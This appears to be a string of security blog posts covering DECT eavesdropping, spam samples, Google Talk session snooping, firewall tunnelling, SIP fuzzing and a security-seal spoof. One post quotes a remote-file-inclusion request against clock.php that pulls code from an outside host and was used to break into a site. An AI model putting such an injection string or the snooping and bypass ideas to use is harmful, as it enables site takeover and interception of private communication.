All your (base) stations belong to us

What started off nicely in 1992 and promised the much needed privacy to cordless communication at home, has been brought into a halt a few days ago with the practical approach to eavesdropping on DECT communication.

DECT or Digital Enhanced Cordless Telecommunication is a widely used standard for cordless devices, mainly phones, but not limited to it, several POS or Point of Sale devices as well use the standard to communicate in a cheap and secure manner.

The DECT standard itself was not broken, but rather using a cheap off-the-shelf device that is able to receive (not yet transmit) DECT based data, the researchers have been able to prove that eavesdropping on the communication channel is possible.

Most interesting to me as a reader of the paper is that what stopped people from ‘breaking’ it till now, was the lack of hardware, or moreover the lack of cheap hardware, to experiment with, now with the availability (it has been around for a while) of COM-ON-AIR device and its character device (or raw software driver) things have been made a lot easier.

You can read more on this at


Encoded message as an effective spam?

Following up on my previous post on spam, it seems that spam has now gone another step and become not just unreadable – foreign language – but also unreadable to the un-computerized eye:

Subject: Please confirm your message



Wow that is nice, I would sure want to buy an IURPQ1…

This is plain silly it is a Base64 encoded message, but why would my reader open it?

There is indication in the email headers that this is Base64 encoded, but I can’t understand what kind of reader will even try to open it as it seems that base64 encode content inside a body is not common practice unless it is part of a multipart message.

Those wondering, the email’s intention is to show you an HTML  that sells you fake? real? pills.


Snoop on Google Talk (Wiretap)

Yes snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting that unlike other chat clients like Skype, MSN and others GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, probably stems from the fact that Google supports web based chat in a constantly refreshing web page (unlike MSN which launches a separate window) allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing – basically never needing to logon/logoff on my PC/BlackBerry they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection :D


SCTP fuzzing made easy

With the recent introduction of a native SCTP library into beSTORM you can easily fuzz your SCTP based protocols with beSTORM.

This includes all our existing protocols as well as SCTP dedicated protocols such as M3UA and MGCP.

SCTP for those that aren’t familiar with it is a fairly common protocol in the VoIP and Telecommunication industry it sits upon IP and ‘replaces’ the TCP/UDP layers. It has several benefits over TCP and UDP but it is mainly used because it has been endorsed by the SIGTRAN group as the primary way of communication between two telecommunication providers.


Why blindly blocking everything is bad for you

Many administrators blindly block anything that isn’t running on either port 80 (http), 443 (https) or 22 (ssh). Their claim is that nothing good can work any other port. This causes their uses to get frustrated when they want to use anything else that runs on any other port.
I am not talking about P2P or any other ‘evil’ programs which are pretty good at bypassing your restrictio on their own, Skype is one such example, I am talking about for example one of your engineers wanting to get techsupport but has his corporate VPN access blocked as most VPNs require at least a non-80, 443, 22 port to be open.

In such cases (as VPN), the techsupport guy will find a way around your restriction, perhaps using port 443 to tunnel the traffic through, even though its not really SSL going inside there :) . The smart administrator will use a Proxy or a Content Filtering agent to prevent such things, so a smart techsupport guy will tunnel everything via SSH, or even use HTTPS to tunnel the data (there are several solutions that do that).

My point is that, blindly blocking will give you the benefit for stopping the common user, but will frustrate a techsupport guy to to the point that he will find a way to bypass it. I suggest that you ‘give’ the techsupport guy a hand, understand what he needs, and give him that. Its better than him bypassing your restriction.

I am sure the readers have additional examples that can strengthen this point.


Tears to my eyes

Yes, this should have brought tears into your eyes too Spam Volumes Drop by Two-Thirds After Firm Goes Offline, but luckily I cried too soon, I have seen spam amounts on the increase in the past 2 weeks. And unlike previous spam that my bogofilter and spamassassin were able to handle, this new spam is something that it can’t – or at least can’t yet.

I wonder what happened to make spam more ‘intelligent’, one thought that comes to my mind is that since now the massive botnet that was used to send spam is owned by someone else, the spam now looks different – something else generates it, while the same network sends it out.

I hope the catch the guy whose keeping this network alive, and take it down once more, we deserve the relief from spam for a few days at least :)

On a side note, I have seen an increase on foreign spam, natively written Russian, Chinese , and Japanese spam – this is even more silly than regular English written spam, as I can’t even start to wonder what they are trying to sell me :)


Obscured busines

Even to right spam you apparently need:

1) A spell checker :)

2) Understand what the words mean

This is the spam email I received, why would someone even want to answer it?

I am Ming Yang,i have an obscured busines suggestion for you.please
Contact me for further details on ( [removed] )

Kind Regards
Ming Yang
Mail: [removed]


Is that a crash in your email reader or you are just happy to see me?

I recently received an email from a co-worker which upon clicking on it (to preview it) my email reader crashed.

The crash was so weird, that I had to try it again :) I reopened the email reader and clicked on the email again, of course it crashed once more.

I investigated a bit further on the matter, and I noticed that the email contained a TNEF file which my email reader tried to automatically parse, and apparently failed due to a bad memcpy directive (copying more than you have allocated space for).

Once I zero in on what is triggering it, I will report it to the vendor.


Buying from spam

I recently received a spam email that wants me to buy solar lamps for the garden, my first impulse of course was to delete it. But I had to admit, I wanted those solar lamps, they looked nice, and the price was ok.

I have no idea what to do now, on the one hand this was sent as part of a spam campain, buying it might prove to be:

1) Fraudulent – pay get nothing (best chances)
2) A scam – pay get nothing worth your money (moderate chances)
3) A legitimate deal – pay and get what I paid for (slim chances)
In addition of course to the fact that if I buy it, I am proving the spammer’s agenda, that someone wants their merchandise and this is their only way to reach him.

What do you guys suggest I do?


My Baby’s Birth

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu


RFC 4475 is not enough

When beSTORM is used to test VoIP products, it’s usually the standard SIP, SDP and RTP fuzzing. But we were recently asked about opinion on RFC 4475, which was an interesting case study. RFC 4475 for those who do not know is an IETF standard whose goal is to give[s] examples of Session Initiation Protocol (SIP) test messages designed to exercise and “torture” a SIP implementation. This is great but as the RFC states, these are just a few examples – to be more specific 49 discrete examples.

These 49 examples claim to check a broad range of problems that a SIP parser may come across, and that it should either ignore, reject it or handle it correctly.These examples try to test more than one malformed, incorrect or problematic field at a time – opening the possibility that one problematic field is preventing others from being processed.

My problem with these 49 cases is that they seem to be very tailored, testing for specific stuff, without testing all the possible variables of that same example. Lets take the Content-Length header. One example checks the resilience to a negative value, another to a large positive, another yet to the value of zero (0).Did you notice what is missing, for example where is the off-by one underflows/overflows?

Another example is the use of IP addresses inside the sample data, a carelessness or a small oversight by the tester might make the whole example invalid and not parser-able by the test subject. It might be discarded by the product making the entire test worthless, but the tester happy for ‘passing’ the test. It’s like passing a final exam by not showing up!
In conclusion, running those 49 examples is not straight forward, in addition once you ran them and passed, can you say you are ok? From experience I can tell you that in many cases, both our customers and open source products we have tested with beSTORM failed the complete fuzzing test while they passed the RFC 4475 – beSTORM simply discovered one or more vulnerabilities in them that simply didn’t fit any of the 49 examples provided inside the RFC 4475 torture examples.

My recommendation? Testing for those 49 examples only tells you that you are compliant with RFC 4475. Only a serious fuzzer will tell you if your product is secure against SIP, SDP or RTP based attacks.


Security seal? sure have one, don’t bother testing or anything

GoDaddy has decided to start giving away security seals to web sites. What is this security seal about? Well, it doesn’t say much beside telling you that GoDaddy verified something – what did they verify? It doesn’t say.

How does it work?

You are supposed to put a script tag inside your site, with the source reference of[removed]

This generates HTML code that contains references to:

Changing the to, or even will show that you have been verified by GoDaddy – yeah!

Try it out yourself and see how you can get a godaddy seal with no effort – joy to the world :)


SCO? Anybody home?

I have been trying to contact the guys at SCO to report a serious vulnerability in their operating system as part of our SSD program, with very little success:

All the emails I send there return with this funny bounce message:

Sorry. Although I’m listed as a best-preference MX or A for that host, it isn’t in my control/locals file, so I don’t treat it as local. (#5.4.6)

A few other emails I sent to people I used to know there, bounced with the same message.

If anyone from SCO reads this post, or you know someone that can help me reach those guys, I would be grateful if you can contact me.


Disaster recovery not just for natural disasters

There is always a lot of talk about disaster recovery being important against, flood, weather, power failures, etc. But very little talk on disaster recovery due to security events.

When a security event happens, it is a disaster. It can mean downtime to your web site, or that your records were deleted or modified, and sometimes the biggest disaster is the bad PR day.

Typical disaster plans talk about a short failover time, but neglect to take into account what happens if one server was compromised. In this case, how will the short failover time affect it – will the corrupt or modified data propagate to the failover server causing two failed sites instead of one?

With recent break-ins reaching the news, where extremist groups hacking into any site they can gain access to, I see too often the web site show a banner, just after the break in, saying that it will be back in a few days. I’m left wondering if when they’re back, will they still suffer from the same security hole (most likely an SQL injection) that allowed the attackers in the first place? What about hidden malware – was the server reinstalled from scratch? And what backup was used to restore – the one with the attacker’s backdoor? I think we all know the answers…


Office file specs released – new vulnerabilities to come?

As Microsoft released the Office file specs for the upcoming Office 2007, I can’t stop from thinking that even though these are specs for Office 2007 files, they must have similarities and are at least partly backward compatible with Office 200x.

This means they can be used by vulnerability researchers (good and bad) to more easily discover new vulnerabilities in Office as with the spec laid out, complete and systematic searching can be done.

Time will tell – lets start counting how many Office related vulnerabilities are released over the next few months – and see if we can find a correlation.


“Security is a thing of the past”

I recently talked to my friend, a nice guy but with limited computer skills, and what he told me quite amazed me:

I stopped caring about security, I no longer install Microsoft patches unless they install themselves automatically, I don’t upgrade my antivirus, antimalware or any other protection mechanism, I simply can’t spend the time doing it – my work is not my computer – the computer is a tool for me you can’t expect me to be an enigneer and fix my car right? so why is this expected from me with my computer?

Why was he talking like that? well simply put he is tired, he is tired of worrying about his computer security, about whether his antivirus is the latest, whether his malware prevention works, whether the patches are needed or not.

Security has become such a burden on the simple people that they are no longer caring about it.

And don’t get him wrong, he is a good guy, he even recently upgraded his hardware to accommodate his new OS installation of Vista – this because he was “promised” that Vista resolved all the security issues and that everything will be seamless – security wise – but of course it isn’t.

Vista is no different from previous OSes, XP promised and failed and I don’t see how the next OS will be able to deliver on its promise of secure OS.

Before you jump and say move to Linux, my friend here hasn’t the option to move to Linux as he needs several programs critical to his job that aren’t available for Linux – of course there are alternatives to them, but he is a professor not a kid, he has work to do with these programs and he can’t now just switch to a different OS and different programs, he has jobs to hand in, and research to do.

I am not sure what I can do for him – beside comfort him :)